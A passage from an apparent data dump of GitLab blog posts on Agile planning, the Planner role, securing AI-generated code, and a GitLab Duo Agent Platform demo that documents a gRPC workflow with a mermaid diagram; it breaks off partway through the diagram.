GitLab provides comprehensive metrics with:\n\n* [Burndown and burnup charts](https://docs.gitlab.com/user/group/iterations/#iteration-burndown-and-burnup-charts) for iterations\n* Velocity tracking\n* [Lead and cycle time](https://docs.gitlab.com/user/group/value_stream_analytics/#lifecycle-metrics) metrics\n* Dashboards that can be scoped to teams\n\nThese metrics help you understand if your team is getting faster, where they're getting stuck, and what you might want to talk about in your next retrospective.\n\n![Burndown and burnup charts](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097576758.png)\n\n## 5 reasons a unified platform provides an advantage\n\nI know there are plenty of planning tools that can handle SAFe ceremonies. But there are game-changing reasons why I genuinely believe GitLab is different:\n\n1. **No more context switching** - Your planning, coding, testing, and security all happen in one place.\n2. **Everything's connected** - You can trace work from the big epic down to the code and deployment.\n3. **Everyone's on the same page** - Developers, product folks, and security teams all work together in the same tool.\n4. **Total visibility** - Stakeholders have one place to check for updates.\n5. **The full picture** - You see planning and development metrics together, so you know what's really going on.\n\nIf your dev teams already love GitLab, why make them jump to another tool for planning or create some complex, cobbled-together integrations? 
Bringing your SAFe planning into GitLab creates a much smoother experience for everyone.\n\n## Implementation principles\n\nI've worked with teams transitioning from traditional SAFe tools to GitLab, and here's what I've learned: Focus on **what each ceremony is trying to accomplish**, not on recreating exact replicas of your old tools.\n\nThe teams that get the most out of GitLab are the ones who embrace its native capabilities instead of fighting against them. Yes, it takes some initial work to figure out how to map your SAFe concepts and set up your workflows. But once you do, you'll find your processes actually get simpler rather than more complex.\n\nThe key is defining conventions that everyone follows. Which labels mean what? How will you track teams? What goes in an epic versus an issue? With a little upfront investment in these decisions, you'll end up with an intuitive system that eliminates all that cross-tool coordination overhead.\n\n## Getting started\n\nReady to give this a shot? Here's how to start implementing SAFe in GitLab:\n\n1. **Set up your structure** - Create groups and subgroups that [match your organization](https://about.gitlab.com/blog/best-practices-to-set-up-organizational-hierarchies-that-scale/).\n2. **Define your work breakdown** - Decide how you'll use [epics](https://about.gitlab.com/blog/unlocking-agile-excellence-gitlab-epics-for-seamless-portfolio-management/), [issues](https://docs.gitlab.com/user/project/issues/managing_issues/), and [tasks](https://docs.gitlab.com/user/tasks/).\n3. **Create your iterations** - Set up your [sprint schedule](https://docs.gitlab.com/user/group/iterations/#create-an-iteration-cadence).\n4. **Add your milestones** - [Milestones](https://docs.gitlab.com/user/project/milestones/#create-a-milestone) will represent your Program Increments in GitLab.\n5. **Build your boards** - Create different views for different ceremonies.\n6. 
**Agree on conventions** - Document how you'll use labels and custom fields.\n\nTaking time to think through these decisions upfront will save you many headaches later. And remember, you don't have to perfect it on day one - you can always adjust as you learn.\n\n## Bringing it all together\n\nGitLab gives you a solid foundation for running SAFe, especially if your dev teams are already GitLab fans. When you bring planning and development into the same tool, you eliminate those painful handoffs, make collaboration way easier, and get everything moving faster.\n\nThe beauty of GitLab's planning tools is that they're flexible enough to adapt to your specific flavor of SAFe. You're not locked into rigid workflows - you can evolve your approach as your teams mature and your needs change.\n\n> Ready to see how much better life is without those planning silos? [Start your free trial today](https://about.gitlab.com/free-trial/) and experience firsthand how GitLab can transform your SAFe implementation.\n\n*💡 If you liked this topic check out this related post - [GitLab for Agile Software Development](https://about.gitlab.com/blog/gitlab-for-agile-software-development/)*\n",[784,475,785,757,786],"agile","features","tutorial",{"slug":788,"featured":91,"template":789},"safe-without-silos-in-gitlab","BlogPost",{"content":791,"config":800},{"title":792,"description":793,"authors":794,"heroImage":795,"date":796,"body":797,"category":668,"tags":798},"How to harmonize Agile sprints with product roadmaps","Apply best practices and GitLab features to your product journey, including creating centralized roadmaps, conducting review sessions, and tracking sprint lifecycles.",[779],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097231/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%2821%29_2pdp2MNB7SoP4MhhiI1WIa_1750097230664.png","2025-02-04","Picture this: Product and Development teams are working in isolation. 
Product has created a 12-month roadmap and communicated it to internal stakeholders but didn't review it with their development team. Dev starts building the features planned for the upcoming sprint without considering the broader product roadmap, leading to missed opportunities to optimize timing, like running projects in parallel, accounting for team capacity, or building reusable APIs that could serve multiple initiatives. The lack of coordination results in inefficiencies and delayed value delivery.\n\nBalancing short-term wins with long-term vision isn’t easy; it requires clear communication, aligned priorities, and the right tools. In this guide, you'll learn strategies to help harmonize your Agile sprints with strategic roadmaps, tackle common challenges, and uncover actionable solutions tailored to your teams.\n\n## The importance of a single source of truth\n\nA consistent single source of truth for roadmaps with longer-range goals ensures you and your teams have access to up-to-date information about the bigger picture. In practice, this means maintaining a single, regularly updated platform where all roadmap details reside rather than keeping versions of the roadmap across multiple formats, each typically with slightly different information, causing a misaligned understanding of where you're headed.\n\n### Create a centralized roadmap\n\nBy creating a centralized roadmap for your team, you can:\n\n* communicate long-range strategy\n* minimize miscommunication\n* facilitate cross-functional alignment\n* quickly adapt to changes without losing context\n* self-serve information, reducing dependency on a single point of contact who retains the information\n\n***GitLab tip**: Use [epics](https://docs.gitlab.com/ee/user/group/epics/) and [Roadmap view](https://docs.gitlab.com/ee/user/group/roadmap/) to support both product planning and the transparent monitoring of delivery. 
The Roadmap view allows you to track progress, identify bottlenecks, and ensure alignment between high-level goals and sprint-level execution.*\n\n![Roadmap view for group](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097239/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097239117.png)\n\n## Collaborative roadmap review practices\n\nEstablish a regular review and sign-off process for roadmap updates that include Product, Engineering, and UX as part of the [product trio](https://www.producttalk.org/product-trio/). Collaborative reviews help you maintain alignment and minimize risk. At GitLab, I meet with my engineering manager and UX designer monthly to review and obtain sign-offs on any changes. We maintain a running sign-off on the roadmap wiki page itself that holds us accountable for keeping the schedule and provides transparency to the rest of the organization.\n\n#### How to extract value from review sessions\n\nTo make the most of the review session, aim for the following best practices:\n\n* Schedule routine reviews, monthly or quarterly, depending on how frequently the roadmap tends to fluctuate at your organization.\n* Validate alignment between product goals, UX lead time, and technical feasibility by discussing potential risks and dependencies upfront.\n  * Validate that the roadmap reflects current organizational business objectives.\n  * Ensure that design timelines are realistic and consider research or validation needs.\n  * Confirm that the roadmap allocates time for technical preparation, such as technical spikes or investigations, and ensures alignment with broader engineering priorities.\n* Optimize team utilization by considering capacity constraints and ensuring the sequence of work aligns with the team’s skill profile. 
This includes avoiding periods of underutilization or skill mismatches while effectively planning for situations like staffing level drops during holidays.\n* Right-size scope and set appropriate expectations about what can be achieved. We all want to do it all, but perfection is the enemy of progress, so prioritize what truly matters to deliver incremental value efficiently. Seek opportunities to optimize by identifying ways to iterate or increase velocity, such as adjusting the order of work to reduce dependencies or leveraging reusable components to streamline development.\n* Encourage open dialogue about trade-offs and priorities to ensure all perspectives are considered. This collaborative approach helps identify creative solutions to challenges and builds consensus on the best path forward.\n\n***GitLab tip**: Use a [GitLab Wiki](https://docs.gitlab.com/ee/user/project/wiki/) page to complement the [Roadmap](https://docs.gitlab.com/ee/user/group/roadmap/) feature. In the wiki, you can include expanded context about your product roadmap, such as business rationale, links to user research, RICE scores, and details about dependencies or risks. Link directly to the roadmap for easy access, and leverage the upcoming discussion threads feature to encourage async collaboration and feedback from your team.*\n\n![PlanFlow product roadmap](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097239/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097239118.png)\n\n## Continuous direction validation and progress measurement\n\nThe goal of a product roadmap isn’t just to stay on track – it’s to deliver real value to your customers. To make space for sharing ongoing user feedback and behavioral data, consider incorporating regular touchpoints across your product trio outside of sprint cycles. These sessions can be used to review insights, analyze trends, and ensure that the product roadmap continues to reflect the evolving needs of your users. 
By grounding roadmap updates using real user insights, you’re not only delivering on outcomes but also adapting to what really matters to your customers.\n\nThe value you ship might come in the form of improved usability, reduced technical debt, or entirely new capabilities. When the product trio is aligned on the roadmap vision, they’re also aligned on the outcomes you’re working to achieve.\n\nTo measure whether you’re on track to deliver those outcomes, you need to closely scope the intended results. Scope creep, like late user story additions, can delay your ability to ship value. Additionally, it’s important to identify work that was delivered but doesn’t align with the roadmap and understand why.\n\n### Sprint planning\n\nRemaining aligned with your product roadmap starts with thoughtful sprint planning. Here are some best practices to keep your team on track and focused on delivering value:\n\n* Clearly define, and narrowly scope, desired outcomes to ensure high confidence in delivery.\n* Identify potential late additions or adjustments that could delay delivery, and build in buffers to maintain focus.\n* Align on the sequence of work with your team to optimize for capacity, skill profiles, and reducing dependencies.\n* To maintain focus and improve confidence of delivering on time, avoid planning to 100% of the team’s capacity. Leave room (10%-20%) for unknowns or new discoveries that may surface during the sprint.\n\n### During the sprint\n\nStaying aligned with your roadmap during the sprint requires focus, communication, and constant evaluation. 
While delivering value is the goal, it’s equally important to ensure the work in progress aligns with the outcomes you’ve scoped and planned.\n\n* Continuously validate the work in progress against roadmap outcomes to ensure every sprint contributes to the bigger picture.\n* Encourage the team to regularly check if they’re still working toward the intended goals and outcomes.\n* Maintain open communication throughout the sprint. Use daily standups or async updates to surface risks, unplanned work, or dependencies early and adjust where necessary.\n* Be ruthless about protecting the sprint. While the urge to solve emerging problems is natural, unplanned work should be carefully evaluated to avoid derailing agreed-upon priorities.\n* Proactively manage scope creep. If new work surfaces mid-sprint, assess whether it aligns with the current roadmap outcome’s narrowly scoped focus. While additional ideas or features may align conceptually with the broader outcome, they may not fit into the immediate plan to deliver value as soon as possible. Document these suggestions and evaluate if they should be considered as part of future iterations or as a nice-to-have for the future, rather than introducing them into the current sprint and delaying agreed-upon priorities.\n\n### Sprint retros\n\nIn your sprint retrospectives, take time to reflect with your team on how well you are collectively progressing toward your desired outcomes. Questions to ask:\n\n* Did any unplanned work get introduced during the sprint that delayed your ability to deliver value? Identify why it happened and what adjustments can be made.\n* Did you deliver any work that deviated from the roadmap? Discuss what led to this and what you can learn for future planning.\n\nFrom sprint planning through retrospectives, staying focused on delivering tangible outcomes to users and stakeholders is a team responsibility. 
By aligning every step of the way, you ensure that your roadmap remains a clear guide for delivering value efficiently and consistently.\n\n***GitLab tip:** Use [burndown charts](https://docs.gitlab.com/ee/user/project/milestones/burndown_and_burnup_charts.html) to visualize progress and detect deviations early, helping your team stay focused on delivering outcomes.*\n\n![Burndown chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097239/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097239120.png)\n\n## Delivering roadmap outcomes with confidence\n\nHarmonizing Agile sprints with strategic roadmaps requires intentionality, team buy-in, and the proper tools. By creating a roadmap single source of truth, fostering collaborative reviews, and measuring progress towards outcomes, you can align execution with vision. With GitLab’s robust planning features, teams can turn challenges into opportunities for innovation and growth.\n\nReady to align your sprints with your strategic roadmap? 
[Start a free trial of GitLab](https://about.gitlab.com/free-trial/) today and explore the tools that can help you deliver outcomes with confidence.\n\n## Learn more\n\n- [Agile planning content hub](https://about.gitlab.com/blog/categories/agile-planning/)\n- [GitLab’s new Planner role for Agile planning teams](https://about.gitlab.com/blog/introducing-gitlabs-new-planner-role-for-agile-planning-teams/)\n- [Get to know the GitLab Wiki for effective knowledge management](https://about.gitlab.com/blog/get-to-know-the-gitlab-wiki-for-effective-knowledge-management/)",[784,786,799,475],"workflow",{"slug":801,"featured":91,"template":789},"how-to-harmonize-agile-sprints-with-product-roadmaps",{"content":803,"config":811},{"title":804,"description":805,"authors":806,"heroImage":807,"date":808,"body":809,"category":668,"tags":810},"Introducing GitLab’s new Planner role for Agile planning teams","Learn how GitLab’s new Planner role helps Agile teams manage planning workflows, with tailored access across SaaS, Dedicated, and Self-managed solutions.",[779],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662488/Blog/Hero%20Images/blog-image-template-1800x945__3_.png","2024-11-25","GitLab launched a new role within the DevSecOps platform – the Planner. Built to align with GitLab’s strategy of providing flexible, role-based access controls, as demonstrated by the release of [custom roles](https://docs.gitlab.com/ee/user/custom_roles.html), the Planner role gives software development teams and planning-focused users access to the tools they need to manage Agile workflows without over-provisioning permissions that could introduce unnecessary risks. 
By tailoring access to meet specific user needs, the Planner role ensures teams can stay productive while maintaining security and compliance, adhering to the [principle of least privilege](https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/).\n\n## Why we created the Planner role\n\nOur journey to this new role started with feedback from our customers and internal teams. We consistently heard that while GitLab offers comprehensive tools for planning and managing Agile development cycles, there was a need for more specific role-based access controls. Product managers, project leads, and other planning roles often required access to planning features but didn’t need full development permissions. In fact, giving them broader access is undesirable, as it increases security risks and potential for errors, such as making unintended changes to code or sensitive configurations. We listened.\n\nThrough user interviews, competitive analysis, and extensive research, we validated the need for a role that grants full access to planning tools while maintaining security by restricting access to developer-centric features.\n\n## What does the Planner role offer?\n\nThe Planner role is a hybrid of the existing [Guest and Reporter roles](https://docs.gitlab.com/ee/user/permissions.html#roles) but designed specifically for those who need access to planning workflows. \n\nHere’s what you can expect:\n\n* Access to key planning tools like epics, roadmaps, issue boards, and [OKRs](https://docs.gitlab.com/ee/user/okrs.html) (*some features may require a GitLab Premium or Ultimate license*)  \n* Enhanced security by limiting unnecessary access to sensitive development features  \n* The Planner role can be used in conjunction with the Enterprise Agile Planning add-on, providing teams with tailored access to planning tools while maintaining security and control.  
(*however, the Planner role itself is available on all license tiers*).\n\nThe Planner role is available across all GitLab solutions, including SaaS, GitLab Dedicated, and Self-managed, ensuring that all customers can benefit from this tailored access.\n\nThis role gives teams the flexibility to align permissions with job functions, creating a balance between accessibility and security.\n\n## How the Planner role supports Agile practices\n\nIn [Agile software development](https://about.gitlab.com/blog/categories/agile-planning/), ensuring that each team member has the right tools and permissions to perform their role is crucial for workflow efficiency. The Planner role supports this by allowing planning team members to fully participate in the planning stages of the software development lifecycle without the risk of overstepping into areas like development or deployment.\n\nFrom creating and managing epics to defining roadmaps, the Planner role gives Agile teams the tools they need to stay aligned and productive.\n\n## Customer-centric design\n\nWe didn’t create this role in isolation. We involved our community in the process every step of the way. Through surveys, interviews, and testing, we fine-tuned the permissions to make sure they fit the real-world needs of product and project managers.\n\nThe role also aligns with GitLab’s long-standing mission to be a platform for enterprise Agile teams, giving businesses the flexibility and control to implement Agile methodologies at scale.\n\n## Community feedback and engagement \n\nWe value your input and encourage you to share your experiences with the new Planner role. Your feedback is essential to help refine and improve your GitLab experience. 
Please visit our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/503817) to provide your thoughts and suggestions.\n\n## Start planning with GitLab today!\n\nThe Planner role is just one of the many ways GitLab empowers software development teams to plan, collaborate, and deliver efficiently. Whether you’re looking to streamline your product management workflows, improve team collaboration, or align your Agile practices, GitLab has the tools to help you succeed.\n\n> Ready to experience the full power of GitLab? [Sign up for a free 60-day GitLab Ultimate trial](https://about.gitlab.com/free-trial/) and start planning your next project with the Planner role, tailored to fit your team's unique needs.\n\n## Read more\n- [Beyond Devs: GitLab Enterprise Agile Planning add-on for all roles](https://about.gitlab.com/blog/gitlab-enterprise-agile-planning-add-on-for-all-roles/)\n- [How to use GitLab for Agile software development](https://about.gitlab.com/blog/gitlab-for-agile-software-development/)\n- [First look: The new Agile planning experience in GitLab](https://about.gitlab.com/blog/first-look-the-new-agile-planning-experience-in-gitlab/)",[784,475,785,757],{"slug":812,"featured":91,"template":789},"introducing-gitlabs-new-planner-role-for-agile-planning-teams",{"category":675,"slug":679,"posts":814},[815,827,839],{"content":816,"config":825},{"title":817,"description":818,"authors":819,"heroImage":821,"body":822,"date":823,"category":679,"tags":824},"3 best practices for building software in the era of LLMs","With AI transforming coding speed, developers need new security habits. Learn what they are and how to deploy them throughout the DevSecOps workflow.",[820],"Salman Ladha","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662523/Blog/Hero%20Images/Gartner_DevOps_Blog_Post_Cover_Image_1800x945__2_.png","AI has rapidly become a core part of modern software development. 
Not only is it helping developers code faster than ever, but it’s also automating low-level tasks like writing test cases or summarizing documentation. According to our [2024 Global DevSecOps Survey](https://about.gitlab.com/developer-survey/), 81% of developers are already using AI in their workflows or plan to in the next two years.\n\nAs code is written with less manual effort, we’re seeing a subtle but important behavioral change: Developers are beginning to trust AI-generated code with less scrutiny. That confidence — understandable as it may be — can quietly introduce security risks, especially as the overall volume of code increases. Developers can’t be expected to stay on top of every vulnerability or exploit, which is why we need systems and safeguards that scale with them. AI tools are here to stay. So, as security professionals, it’s incumbent on you to empower developers to adopt them in a way that improves both speed and security.\n\nHere are three practical ways to do that. \n\n## Never trust, always verify\n\nAs mentioned above, developers are beginning to trust AI-generated code more readily, especially when it looks clean and compiles without error. To combat this, adopt a zero-trust mindset. While we often talk about [zero trust](https://about.gitlab.com/blog/why-devops-and-zero-trust-go-together/) in the context of identity and access management, the same principle can be applied here with a slightly different framing. Treat AI-generated code like input from a junior developer: helpful, but not production-ready without a proper review. \n\nA developer should be able to explain what the code is doing and why it’s safe before it gets merged. Reviewing AI-generated code might even shape up to be an emerging skillset required in the world of software development. The developers who excel at this will be indispensable because they’ll marry the speed of LLMs with the risk reduction mindset to produce secure code, faster. 
\n\nThis is where tools like [GitLab Duo Code Review](https://docs.gitlab.com/user/project/merge_requests/duo_in_merge_requests/) can help. As a feature of our AI companion across the software development lifecycle, it brings AI into the code review process, not to replace human judgment, but to enhance it. By surfacing questions, inconsistencies, and overlooked issues in the merge requests, AI can help developers keep up with the very AI that’s accelerating development cycles. \n\n## Prompt for secure patterns\n\nLarge language models ([LLMs](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/)) are powerful, but only as precise as the prompts they’re given. That’s why prompt engineering is becoming a core part of working with AI tools. In the world of LLMs, your input *is* the interface. Developers who learn to write clear, security-aware prompts will play a key role in building safer software from the start.\n\nFor example, vague requests like “build a login form” often produce insecure or overly simplistic results. However, by including more context, such as “build a login form **with** input validation, rate limiting, and hashing, **and** support phishing-resistant authentication methods like passkeys,” you’re more likely to produce an output that meets the security standards of your organization. \n\nRecent [research](https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted) from Backslash Security backs this up. They found that secure prompting improved results across popular LLMs. When developers simply asked models to “write secure code,” success rates remained low. However, when prompts referenced [OWASP best practices](https://cheatsheetseries.owasp.org/cheatsheets/LLM_Prompt_Injection_Prevention_Cheat_Sheet.html), the rate of secure code generation increased. 
\n\nPrompt engineering should be part of how we train and empower security champions within development teams. Just like we teach secure coding patterns and threat modeling, we should also be teaching developers how to guide AI tools with the same security mindset. \n\n> Learn more with these helpful [prompt engineering tips](https://docs.gitlab.com/development/ai_features/prompt_engineering/).\n\n## Scan everything, no exceptions\n\nThe rise of AI means we’re writing more code, quicker, with the same number of humans. That shift should change how we think about security, not just as a final check, but as an always-on safeguard woven into every aspect of the development process.\n\nMore code means a wider attack surface. And when that code is partially or fully generated, we can’t solely rely on secure coding practices or individual intuition to spot risks. That’s where automated scanning comes in. [Static Application Security Testing (SAST)](https://docs.gitlab.com/user/application_security/sast/), [Software Composition Analysis (SCA)](https://docs.gitlab.com/user/application_security/dependency_scanning/), and [Secret Detection](https://docs.gitlab.com/user/application_security/secret_detection/) become critical controls to mitigate the risk of secret leaks, supply chain attacks, and weaknesses like SQL injections. With platforms like GitLab, [application security](https://about.gitlab.com/solutions/security-compliance/) is natively built into the developer's workflow, making it a natural part of the development lifecycle. Scanners can also trace through the entire program to make sure new AI-generated code is secure *in the context of all the other code* — that can be hard to spot if you’re just looking at some new code in your IDE or in an AI-generated patch.\n\nBut it’s not just about scanning, it’s about keeping pace. If development teams are going to match the speed of AI-assisted development, they need scans that are fast, accurate, and built to scale. 
Accuracy especially matters. If scanners overwhelm developers with false positives, there’s a risk of losing trust in the system altogether. \n\nThe only way to move fast *and* stay secure is to make scanning non-negotiable. \n\nEvery commit. Every branch. No exceptions.\n\n## Secure your AI-generated code with GitLab\n\nAI is changing the way we build software, but the fundamentals of secure software development still apply. Code still needs to be reviewed. Threats still need to be tested. And security still needs to be embedded in the way we work. At GitLab, that’s exactly what we’ve done. \n\nAs a developer platform, we’re not bolting security onto the workflow — we’re embedding it directly where developers already work: in the IDE, in merge requests, and in the pipeline. Scans run automatically and relevant security context is surfaced to facilitate faster remediation cycles. And, because it’s part of the same platform where developers build, test, and deploy software, there are fewer tools to juggle, less context switching, and a much smoother path to secure code.\n\nAI features like [Duo Vulnerability Explanation and Vulnerability Resolution](https://about.gitlab.com/the-source/ai/understand-and-resolve-vulnerabilities-with-ai-powered-gitlab-duo/) add another layer of speed and insight, helping developers understand risks and fix them faster, without breaking their flow.\n\nAI isn’t a shortcut to security. But with the right practices — and a platform that meets developers where they are — it can absolutely be part of building software that’s fast, secure, and scalable. \n\n> Start your [free 60-day trial of GitLab Ultimate with Duo Enterprise](https://about.gitlab.com/free-trial/) and experience what it’s like to build secure software, faster. 
With native security scanning, AI-powered insights, and a seamless developer experience, GitLab helps you shift security left without slowing down.","2025-07-10",[675,767],{"featured":91,"template":789,"slug":826},"3-best-practices-for-building-software-in-the-era-of-llms",{"config":828,"content":830},{"slug":829,"featured":91,"template":789},"accelerate-learning-with-gitlab-duo-agent-platform",{"title":831,"description":832,"authors":833,"heroImage":835,"date":836,"category":679,"tags":837,"body":838},"Accelerate learning with GitLab Duo Agent Platform","Learn how agentic AI helped generate comprehensive gRPC documentation in minutes, not hours.",[834],"Halil Coban","Blog/Hero%20Images/Workflow_1800x945.png","2025-07-07",[679,786,757,767],"At GitLab, we continue to expand our AI capabilities so I often find myself learning and working in new codebases. Whether I'm debugging issues, implementing new features, or onboarding to different projects, understanding system architecture quickly is crucial. But let's be honest — manually tracing through complex communication flows, especially gRPC connections, can eat up hours of productive development time.\n\nThis is exactly the type of tedious, yet necessary, work [GitLab Duo Agent Platform](https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/) is designed to handle. 
Instead of replacing developers, it amplifies our capabilities by automating routine tasks so we can focus on creative problem solving and strategic technical work.\n\nLet me show you how I used [Duo Agent Platform](https://about.gitlab.com/gitlab-duo/agent-platform/) to generate comprehensive documentation for a Golang project's gRPC communication flow — and how it transformed hours of code analysis into a few minutes of guided interaction.\n\nYou can follow along with this video:\n\n\u003Cdiv style=\"padding:75% 0 0 0;position:relative;\">\u003Ciframe src=\"https://player.vimeo.com/video/1098569263?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share\" style=\"position:absolute;top:0;left:0;width:100%;height:100%;\" title=\"AI Agent Generates Complete gRPC Documentation in Minutes | GitLab Duo Agent Platform Demo\">\u003C/iframe>\u003C/div>\u003Cscript src=\"https://player.vimeo.com/api/player.js\">\u003C/script>\n\n## The challenge: Understanding gRPC communication flows\n\nI was working with a project called \"Duo Workflow Executor\" that communicates with a gRPC server. Rather than spending my afternoon manually tracing through the codebase to understand the communication patterns, I decided to let Duo Agent Platform handle the heavy lifting.\n\nMy goal was simple: generate a clear diagram showing how the gRPC communication works, including what payloads are received, what actions are executed, and what responses are sent back.\n\nWorking in VS Code with the GitLab Workflow extension installed, I opened the project and crafted a specific prompt for Duo Agent Platform:\n\n\"Can you prepare a mermaid diagram that shows the gRPC connection between duo-workflow-service and this project. It should show what this project receives in gRPC payload, and what actions it executes based on the payload, and what it sends back. 
Study internal/services/runner/runner.go, especially the Run method, and write the mermaid output to a grpc.md file.\"\n\nDuo Agent Platform didn't just blindly execute my request — it began intelligently gathering context to create a comprehensive execution plan. The platform automatically:\n\n* Searched through relevant Go files in the project  \n* Read the specific file I mentioned (runner.go)  \n* Identified additional files that would provide necessary context  \n* Analyzed the codebase structure to understand the gRPC implementation\n\nThis contextual awareness is what sets agentic AI tools with great context apart from simple code generation tools. Instead of working in isolation, Duo Agent Platform understands the relationships between different components of your project.\n\n## Collaborative refinement\n\nRather than making assumptions, Duo Agent Platform is designed to keep a human in the loop at critical moments in task execution to deliver better results. In this scenario, the platform paused to ask clarifying questions about the level of detail I wanted. \n\n**Agent:** \"Should I include error handling details in the diagram?\" \n\n**Me:** \"Don't focus on error handling. Include all actions. Focus on gRPC payload.\"\n\nThis back-and-forth refinement is crucial. The agent isn't just executing commands — it's working with me to ensure the deliverable meets my specific requirements.\n\n## Execution and results\n\nWith the clarified requirements, Duo Agent Platform finalized its execution plan and requested confirmation before proceeding. I could have modified the approach at this stage, but the plan was perfectly aligned with what I needed.\n\nThe agent then executed each task in sequence, providing real-time progress updates. 
Within minutes, it had:\n\n* Analyzed all relevant files across the project  \n* Created comprehensive documentation with a detailed mermaid diagram  \n* Saved everything to the requested grpc.md file  \n* Included valuable context about outgoing payloads and connection management\n\nThe resulting documentation wasn't just a basic diagram — it was thorough, accurate, and immediately useful for understanding the system architecture.\n\n## Reviewing the output\n\nHere's the actual mermaid diagram that Duo Agent Platform created, showing the complete gRPC communication flow:\n\n```mermaid\nsequenceDiagram\nparticipant DWS as duo-workflow-service\nparticipant DWE as duo-workflow-executor\nparticipant Runner as ExecutionRunner\nparticipant ActionExecutor as Action Executor\nparticipant FileSystem as File System/Commands\n\n\nNote over DWS, DWE: gRPC Bidirectional Streaming (ExecuteWorkflow)\n\n%% Connection Establishment\nDWE->>DWS: gRPC Connection with Headers\nNote over DWE, DWS: Headers: authorization (Bearer token)\u003Cbr/>x-gitlab-authentication-type: oidc\u003Cbr/>x-gitlab-realm, x-gitlab-global-user-id\u003Cbr/>x-gitlab-oauth-token, x-gitlab-base-url\u003Cbr/>x-gitlab-instance-id, x-request-id\u003Cbr/>x-gitlab-namespace-id, x-gitlab-project-id\n\n\n%% Workflow Start Request\nDWE->>DWS: ClientEvent{StartWorkflowRequest}\nNote over DWE, DWS: StartWorkflowRequest:\u003Cbr/>- ClientVersion\u003Cbr/>- WorkflowDefinition\u003Cbr/>- Goal\u003Cbr/>- WorkflowID\u003Cbr/>- WorkflowMetadata\u003Cbr/>- ClientCapabilities[]\n\n\n%% Action Processing Loop\nloop Action Processing\n    DWS->>DWE: Action Message\n    Note over DWS, DWE: Action Types:\u003Cbr/>- Action_RunCommand {program, flags[], arguments[]}\u003Cbr/>- Action_RunGitCommand {command, arguments[], repositoryUrl}\u003Cbr/>- Action_RunReadFile {filepath}\u003Cbr/>- Action_RunWriteFile {filepath, contents}\u003Cbr/>- Action_RunEditFile {filepath, oldString, newString}\u003Cbr/>- Action_RunHTTPRequest {method, 
path, body}\u003Cbr/>- Action_ListDirectory {directory}\u003Cbr/>- Action_FindFiles {namePattern}\u003Cbr/>- Action_Grep {searchDirectory, pattern, caseInsensitive}\u003Cbr/>- Action_NewCheckpoint {}\u003Cbr/>- Action_RunMCPTool {}\n\n\n    DWE->>Runner: Receive Action\n    Runner->>Runner: processWorkflowActions()\n    Runner->>ActionExecutor: executeAction(ctx, action)\n    \n    alt Action_RunCommand\n        ActionExecutor->>FileSystem: Execute Shell Command\n        Note over ActionExecutor, FileSystem: Executes: program + flags + arguments\u003Cbr/>in basePath directory\n        FileSystem-->>ActionExecutor: Command Output + Exit Code\n    \n    else Action_RunReadFile\n        ActionExecutor->>FileSystem: Read File\n        Note over ActionExecutor, FileSystem: Check gitignore rules\u003Cbr/>Read file contents\n        FileSystem-->>ActionExecutor: File Contents\n    \n    else Action_RunWriteFile\n        ActionExecutor->>FileSystem: Write File\n        Note over ActionExecutor, FileSystem: Check gitignore rules\u003Cbr/>Create/overwrite file\n        FileSystem-->>ActionExecutor: Success/Error Message\n    \n    else Action_RunEditFile\n        ActionExecutor->>FileSystem: Edit File\n        Note over ActionExecutor, FileSystem: Read → Replace oldString with newString → Write\u003Cbr/>Check gitignore rules\n        FileSystem-->>ActionExecutor: Edit Result Message\n    \n    else Action_RunGitCommand\n        ActionExecutor->>FileSystem: Execute Git Command \n        Note over ActionExecutor, FileSystem: Git operations with authentication\u003Cbr/>Uses provided git config\n        FileSystem-->>ActionExecutor: Git Command Output\n    \n    else Action_RunHTTPRequest\n        ActionExecutor->>DWS: HTTP Request to GitLab API\n        Note over ActionExecutor, DWS: Method: GET/POST/PUT/DELETE\u003Cbr/>Path: API endpoint\u003Cbr/>Body: Request payload\u003Cbr/>Headers: Authorization\n        DWS-->>ActionExecutor: HTTP Response\n    \n    else 
Action_ListDirectory\n        ActionExecutor->>FileSystem: List Directory Contents\n        Note over ActionExecutor, FileSystem: Respect gitignore rules\n        FileSystem-->>ActionExecutor: Directory Listing\n    \n    else Action_FindFiles\n        ActionExecutor->>FileSystem: Find Files by Pattern\n        Note over ActionExecutor, FileSystem: Recursive search with name pattern\u003Cbr/>Respect gitignore rules\n        FileSystem-->>ActionExecutor: File Paths List\n    \n    else Action_Grep\n        ActionExecutor->>FileSystem: Search Text Pattern\n        Note over ActionExecutor, FileSystem: Recursive text search\u003Cbr/>Case sensitive/insensitive option\n        FileSystem-->>ActionExecutor: Search Results\n    \n    else Action_NewCheckpoint/Action_RunMCPTool\n        ActionExecutor->>ActionExecutor: No-op Action\n        Note over ActionExecutor: Returns empty success result\n    end\n\n\n    ActionExecutor-->>Runner: Action Result (string)\n    \n    alt Result Size Check\n        Runner->>Runner: Check if result > 4MB\n        Note over Runner: If result exceeds MaxMessageSize (4MB)\u003Cbr/>Replace with error message about size limit\n    end\n\n\n    Runner->>DWE: ActionResponse\n    DWE->>DWS: ClientEvent{ActionResponse}\n    Note over DWE, DWS: ActionResponse:\u003Cbr/>- RequestID (matches Action.RequestID)\u003Cbr/>- Response (execution result string)\nend\n\n\n%% Workflow Completion\nDWE->>DWS: CloseSend()\nNote over DWE, DWS: Signal end of workflow execution\n\n\n%% Analytics and Cleanup\nRunner->>Runner: Send Analytics Event 